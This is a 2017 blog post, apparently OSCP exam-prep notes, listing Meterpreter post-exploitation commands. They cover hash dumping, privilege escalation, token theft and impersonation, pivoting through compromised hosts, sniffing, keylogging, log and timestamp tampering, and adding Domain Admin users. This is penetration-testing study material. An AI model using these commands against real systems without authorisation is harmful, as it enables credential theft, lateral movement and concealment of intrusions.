Monday, September 4, 2017

OSCP - Meterpreter

Basic Commands

sysinfo
getpid
getuid
ps
ps -S notepad.exe
kill <pid>
ipconfig
route
migrate <PID>
getsystem
getprivs
use priv
hashdump
shell
background

File System Commands

ls
pwd
cd
del <file>
cat <file>
edit <file>
upload <src_file> <dst_file>
download <src_file> <dst_file>
getwd
getlwd

Port Forwarding

We have compromised victim1 and hold a Meterpreter session with id session_id. Background the session and add the route below; it sends all traffic destined for victim2_subnet through victim1.
route add <victim2_subnet> <netmask> <session_id>
route -h
route list
route delete <victim2_subnet> <netmask> <session_id>
portfwd forwards traffic from local port l on Kali (localhost) to port p on Target2, relayed through the compromised Target1 that the current session runs on: -l is the local listening port, -p the remote port and -r the remote host.
portfwd
portfwd add -l 1111 -p 2222 -r Target2
portfwd remove -l 1111 -p 2222 -r Target2

Execute Processes

Execute cmd.exe and interact with it
execute -f cmd.exe -i
Execute cmd.exe with all available tokens
execute -f cmd.exe -i -t
Execute cmd.exe with all available tokens and make it a hidden process
execute -f cmd.exe -i -H -t
  -H  Create the process hidden from view
  -a  Arguments to pass to the command
  -i  Interact with the process after creating it
  -m  Execute from memory
  -t  Execute process with currently impersonated thread token
Run Meterpreter-based scripts; for a full list check the scripts/meterpreter directory
run <scriptname>

Registry

Interact, create, delete, query, set, and much more in the target’s registry
reg <Command> [OPTIONS]
Commands:
enumkey -> Enumerate the supplied registry key
createkey / deletekey -> Create/delete the supplied registry key
setval / queryval -> Set/query values in the supplied registry key
Options:
-d -> Data to store in the registry value
-k -> The registry key
-v -> The registry value name

Tokens

use incognito
list_tokens -u
list_tokens -g
impersonate_token DOMAIN_NAME\\USERNAME
steal_token PID
drop_token
rev2self

Sniffing

use sniffer
sniffer_interfaces
sniffer_dump interfaceID pcapname
sniffer_start interfaceID packet-buffer
sniffer_stats interfaceID
sniffer_stop interfaceID

Post Exploitation

add_user username password -h ip
add_group_user "Domain Admins" username -h ip
clearav
timestomp
screenshot
keyscan_start
keyscan_dump
keyscan_stop
uictl enable keyboard/mouse
setdesktop number
reboot
run post/windows/manager/enable_rdp
Run msfmap
Download it from http://code.google.com/p/msfmap
load msfmap
msfmap
